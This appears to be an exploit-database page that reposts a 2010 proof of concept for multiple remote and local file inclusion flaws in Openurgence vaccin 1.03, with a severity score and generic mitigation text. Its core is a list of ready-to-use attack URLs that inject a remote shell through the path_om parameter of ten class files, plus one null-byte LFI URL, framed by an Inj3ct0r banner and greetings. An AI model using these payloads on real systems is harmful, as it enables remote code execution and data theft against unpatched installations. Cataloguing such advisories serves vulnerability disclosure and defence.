header-logo
Suggest Exploit
vendor:
Openurgence vaccin
by:
cr4wl3r
7.5
CVSS
HIGH
RFI/LFI
Not mentioned
CWE
Product Name: Openurgence vaccin
Affected Version From: 01.03
Affected Version To: 01.03
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability

The Openurgence vaccin 1.03 software is vulnerable to multiple file inclusion vulnerabilities, which can be exploited by remote or local attackers to include arbitrary files. This can lead to remote code execution, information disclosure, or denial of service attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a version that is not affected by this vulnerability. Additionally, it is advised to implement proper input validation and sanitization to prevent file inclusion attacks.
Source

Exploit-DB raw data:

=====================================================================
Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability
=====================================================================

[+] Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/gen/obj/collectivite.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/injection.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/droit.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/laboratoire.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/vaccin.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/effetsecondaire.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/medecin.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/individu.class.php?path_om=[Shell]
http://shell4u.tk/[path]/gen/obj/profil.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-13]

Navigation

Suggest Exploit

Services By CQR